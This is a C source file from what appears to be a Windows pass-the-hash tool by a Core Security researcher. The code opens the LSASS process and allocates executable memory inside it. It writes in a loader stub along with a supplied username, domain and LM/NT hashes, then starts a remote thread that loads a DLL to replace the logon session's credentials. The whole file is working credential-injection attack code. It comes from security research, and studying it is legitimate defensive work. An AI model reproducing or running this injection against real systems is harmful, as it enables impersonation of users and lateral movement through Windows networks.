// $Id: dllfuncs.c,v 1.4 2008/06/12 15:40:15 hochoa Exp $

/*
 * Dllfuncs.c
 *
 * Description: 
 *
 * Author: Hernan Ochoa (hochoa@coresecurity.com) (hernan@gmail.com)
 *
 * Copyright (c) 2007-2008 Hernan Ochoa, Buenos Aires, Argentina.
 * All rights reserved.
 *
 *
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
WARRANTIES
 * ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI S.A. BE LIABLE FOR ANY
DIRECT,
 * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR CONSEQUENTIAL DAMAGES
 * RESULTING FROM THE USE OR MISUSE OF ANY RECOMPILATION OF THIS SOURCE
 * CODE NOT PROVIDED BY CORE SDI S.A.
 **/

#include <stdio.h>
#include ".\iamdll\iamdll.h"
#include "Dllfuncs.h"
#include "findfuncs.h"

// This is the function used to load the dll in lsass
static BOOL RemoteFunction (REMOTE_INFO *pInfo)
{
	HINSTANCE hDll;
	pGenFunc_t pGenFunc;
	BOOL bStatus = FALSE;

	hDll = pInfo->pLoadLibrary(pInfo->szDllName);
	if (hDll != NULL)
	{
		pGenFunc = (pGenFunc_t) pInfo->pGetProcAddress(hDll, pInfo->szProcName);
		if (pGenFunc != 0)
		{
			bStatus = pGenFunc(pInfo);
		}
		pInfo->pFreeLibrary(hDll);
	}

    return bStatus;
}

// This is just a dummy used to get the address after RemoteFunction
static void DummyFunc ()
{
	return;
}

BOOL InjectDll(DWORD dwLsassPID, DWORD dwlogonID,UINT cmd, BOOL bFindFuncs, DWORD dwDLL_MS, DWORD dwDLL_LS, char* Username, char* Domain, char* LMHash, char* NTHash, AddressesGroup* pAddrGroup)
{
struct CREDENTIALS_t creds;
DWORD dwFuncSize;
DWORD dwBytesToAlloc;
LPVOID pRemoteAlloc;
REMOTE_INFO remInfo;
HINSTANCE hKernel32;
CHAR szDllName[MAX_PATH];
DWORD dwBytesWritten;
HANDLE hRemoteThread;
DWORD dwIgnored;
LPSTR pProcName;
BOOL bStatus;
HANDLE hLSASSProc;
int l, x;
AddressesGroup addrGroup;


	bStatus = FALSE;
	pRemoteAlloc = NULL;
	hRemoteThread = 0;


	if( dwLsassPID == 0 || dwlogonID == 0 || Username == NULL || Domain == NULL || LMHash == NULL || NTHash == NULL )
		return FALSE;

	// Obtain handle to LSASS
	hLSASSProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwLsassPID);
	if( hLSASSProc == INVALID_HANDLE_VALUE ) return FALSE;

	//printf("hLSASSPROC: %.8Xh\n", hLSASSProc);

	hKernel32 = LoadLibrary("kernel32.dll");
	remInfo.pLoadLibrary = (pLoadLib_t)GetProcAddress(hKernel32, "LoadLibraryA");
	remInfo.pGetProcAddress = (pGetProcAddr_t)GetProcAddress(hKernel32, "GetProcAddress");
	remInfo.pFreeLibrary = (pFreeLib_t)GetProcAddress(hKernel32, "FreeLibrary");

	GetModuleFileName(NULL, szDllName, sizeof(szDllName));
	strcpy(strrchr(szDllName, '\\') + 1, "iamdll.dll");
	strncpy(remInfo.szDllName, szDllName, sizeof(remInfo.szDllName));

	pProcName = "ChangeCreds";
	strcpy(remInfo.szNewName, Domain);
		
	creds.domain.len = strlen(Domain)*2;
	creds.domain.maxlen = creds.domain.len+2;
	creds.domain.buffer = (char*)32+16;
	creds.name.len = strlen(Username)*2;
	creds.name.maxlen = creds.name.len+2;
	creds.name.buffer = (char*)32+16+sizeof(creds.domainbuffer);

	memcpy(creds.nthash, NTHash, 16);
	memcpy(creds.lmhash, LMHash, 16);

	remInfo.logonid = dwlogonID;

	ZeroMemory(creds.domainbuffer, sizeof(creds.domainbuffer));
	ZeroMemory(creds.namebuffer, sizeof(creds.namebuffer));

	// we convert the domain and username from pchar to unicode
	// strings

	l = 0;
	x = 0;
	for(l=0, x=0; l<(int)strlen(Domain); l++, x+=2) {
			creds.domainbuffer[x] = Domain[l];
			creds.domainbuffer[x+1] = 0;
	}

	for(l=0, x=0; l<(int)strlen(Username); l++, x+=2) {
			creds.namebuffer[x] = Username[l];
			creds.namebuffer[x+1] = 0;
	}

	remInfo.creds = creds;

 	// DLL Version Info
	remInfo.dwDLL_MS = dwDLL_MS;
	remInfo.dwDLL_LS = dwDLL_LS;
	
	strncpy (remInfo.szProcName, pProcName, sizeof(remInfo.szProcName));
	remInfo.szProcName[ sizeof(remInfo.szProcName) - 1 ] = '\0';

	remInfo.useAddresses = 0;


	// if bFindFuncs == TRUE find memory addresses
	if( bFindFuncs == TRUE ) {
		if( findFuncs( &addrGroup ) == FALSE ) {
			return FALSE;
		}
		remInfo.AC_Address = (DWORD)addrGroup.pAddCredential;
		remInfo.EM_Address = (DWORD)addrGroup.pEncryptMemory;
		remInfo.useAddresses = 1;
	} else {

		if( pAddrGroup != NULL ) {
			remInfo.AC_Address = (DWORD)pAddrGroup->pAddCredential;
			remInfo.EM_Address = (DWORD)pAddrGroup->pEncryptMemory;
			remInfo.useAddresses = 1;
		}


	}

	// Determine amount of memory to allocate
	dwFuncSize = (DWORD)DummyFunc - (DWORD)RemoteFunction;
	//printf("dwFuncSize: %d\n", dwFuncSize);
	dwBytesToAlloc = dwFuncSize + sizeof(REMOTE_INFO) + 4;
	//printf("dwBytesToAlloc: %d\n", dwBytesToAlloc);

	// Allocate memory in remote proc
	pRemoteAlloc = VirtualAllocEx(hLSASSProc, NULL, dwBytesToAlloc,
		MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	if (pRemoteAlloc == NULL)
	{
	goto clean;
   	}
   
	//printf("pRemoteAlloc: %.8Xh\n", pRemoteAlloc); 
	//printf("REMOTE_INFO: %d\n", sizeof(REMOTE_INFO) );

	// Write data to the proc
	if (!WriteProcessMemory(hLSASSProc, pRemoteAlloc, &remInfo, sizeof(remInfo),
		&dwBytesWritten))
	{
	goto clean;
	}

	// Write code to the proc
	if (!WriteProcessMemory(hLSASSProc, (PBYTE)pRemoteAlloc + sizeof(REMOTE_INFO) + 4,
		(LPVOID)(DWORD)RemoteFunction, dwFuncSize, &dwBytesWritten))
	{
	printf("Error!!\n");
	goto clean;
	}


	// Create the remote thread
	hRemoteThread = CreateRemoteThread(hLSASSProc, NULL, 0,
		(LPTHREAD_START_ROUTINE)((PBYTE) pRemoteAlloc + sizeof(REMOTE_INFO) + 4),
		pRemoteAlloc, 0, &dwIgnored);

	if (!hRemoteThread)
	{
	goto clean;
	}

	// Wait for the thread
	WaitForSingleObject(hRemoteThread, INFINITE);

	bStatus = TRUE;

clean:
	if (hRemoteThread)
	{
		CloseHandle(hRemoteThread);
	}

	// Free the memory
	VirtualFreeEx(hLSASSProc, pRemoteAlloc, 0, MEM_RELEASE);

	return bStatus;
}


